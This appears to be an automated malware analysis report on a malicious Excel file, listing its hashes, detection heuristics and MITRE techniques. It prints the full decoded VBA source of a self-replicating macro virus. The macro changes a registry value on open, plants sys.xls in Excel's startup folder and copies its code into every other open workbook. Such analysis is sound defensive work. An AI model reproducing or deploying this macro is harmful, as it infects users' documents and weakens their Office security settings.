Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fde0dc509db9ccae…

MALICIOUS

Office (OLE)

56.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 32d63609263f3e1371d2e9da3b42a7cb SHA-1: fbbd9068fb7d65ee3bb7fa936ec13eb9518bd8b5 SHA-256: fde0dc509db9ccae89466adf4030df690ac4448663f2be7804325472d26129be
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel document contains a Workbook_Open VBA macro designed to establish persistence. The macro attempts to write to the registry key HKCU\Software\Microsoft\Office\8.0\Excel\Microsoft Excel, likely to ensure execution on system startup. The macro also attempts to export its own code and potentially inject it into other components, suggesting a downloader or dropper functionality.

Heuristics 6

  • ClamAV: Xls.Trojan.Adversary-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Adversary-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 33,112 bytes but its declared streams total only 0 bytes — 33,112 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5138 bytes
SHA-256: 88191cf5667af9e5471e13430564f0eb9408a9e04f73cd8413fbd6d9a5135929
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Compare Text 'FRIEND
Private Declare Function RegOpenKeyExA Lib "advapi32.dll" _
(ByVal hKey As Long, ByVal lpSubKey As _
String, ByVal ulOptions As Long, ByVal samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib "advapi32.dll" _
(ByVal hKey As Long, ByVal lpValueName As _
String, ByVal Reserved As Long, ByVal dwType As Long, _
lpData As Any, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" _
(ByVal hKey As Long) As Long
Const HKEY_CURRENT_USER = &H80000001
Const KEY_ALL_ACCESS = &H3F
Const lngData As Long = 0
Const REG_DWORD As Long = 4
Private Sub Workbook_Activate()
Infect
End Sub
Function Infect()
On Error GoTo xnctsg
Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").Export "c:\office.sys"
For Each yactgf In VBProject.VBE.VBProjects
xcctsg = yactgf.VBComponents.Count
For Each xcctxg In yactgf.VBComponents
yactxg = xcctxg.Name
If yactxg = "ThisWorkbook" Then
If yactgf.VBComponents(yactxg).CodeModule.CountOfLines <= 1 Then
yactgf.VBComponents(yactxg).CodeModule.AddFromFile "c:\office.sys"
With yactgf.VBComponents(yactxg).CodeModule
For asjjh = 1 To 4
.DeleteLines 1
Next asjjh
End With
End If
End If
Next xcctxg
5 Next yactgf
Exit Function
xnctsg:
If Err.Number = 50289 Then
Err.Clear
Resume 5
End If
End Function
Private Sub Workbook_Open()
u = RegOpenKeyExA(HKEY_CURRENT_USER, _
"Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0&, _
KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "Options6", 0&, REG_DWORD, lngData, 4)
u = RegCloseKey(k)
Application.DisplayAlerts = False
Application.ScreenUpdating = False
For Each wbxxc In Workbooks
If wbxxc.Name = "sys.xls" And ThisWorkbook.Name <> "sys.xls" Then
Application.DisplayAlerts = True
Application.ScreenUpdating = True
Exit Sub
End If
If wbxxc.Name = "sys.xls" And ThisWorkbook.Name = "sys.xls" Then GoTo 99
Next wbxxc
Application.Workbooks.Add
ActiveWorkbook.SaveAs (Application.StartupPath & "\sys.xls")
ActiveWindow.Visible = True
99 On Error GoTo xnctsg
If ThisWorkbook.Name = "sys.xls" Then
Application.Workbooks.Add
End If
Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").Export "c:\office.sys"
For Each yactgf In VBProject.VBE.VBProjects
xcctsg = yactgf.VBComponents.Count
For Each xcctxg In yactgf.VBComponents
yactxg = xcctxg.Name
If yactxg = "ThisWorkbook" Then
If yactgf.VBComponents(yactxg).CodeModule.CountOfLines <= 1 Then
yactgf.VBComponents(yactxg).CodeModule.AddFromFile "c:\office.sys"
With yactgf.VBComponents(yactxg).CodeModule
For asjjh = 1 To 4
.DeleteLines 1
Next asjjh
End With
End If
End If
Next xcctxg
5 Next yactgf
Application.Workbooks("sys.xls").Close savechanges:=True
Application.DisplayAlerts = True
Application.ScreenUpdating = True
Exit Sub
xnctsg:
If Err.Number = 50289 Then
Err.Clear
Resume 5
End If
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
u = RegOpenKeyExA(HKEY_CURRENT_USER, _
"Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0&, _
KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "Options6", 0&, REG_DWORD, lngData, 4)
u = RegCloseKey(k)
If ThisWorkbook.Name = "sys.xls" Then Exit Sub
Infect
End Sub




























Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attrib
... (truncated)
embedded_office_off000060a8.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x60A8 33112 bytes
SHA-256: 138ce92b9e06a6785db7b3e345004b6af2bf3b97ea73eca70608a31ecdf9dd26
embedded_office_off000090b0.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x90B0 20816 bytes
SHA-256: 5608815c044265ec86130ceedebb47ef8e9e5f0b53baa26e69eb5fe135862536

Open this report in the interactive analyzer, or submit your own file for analysis.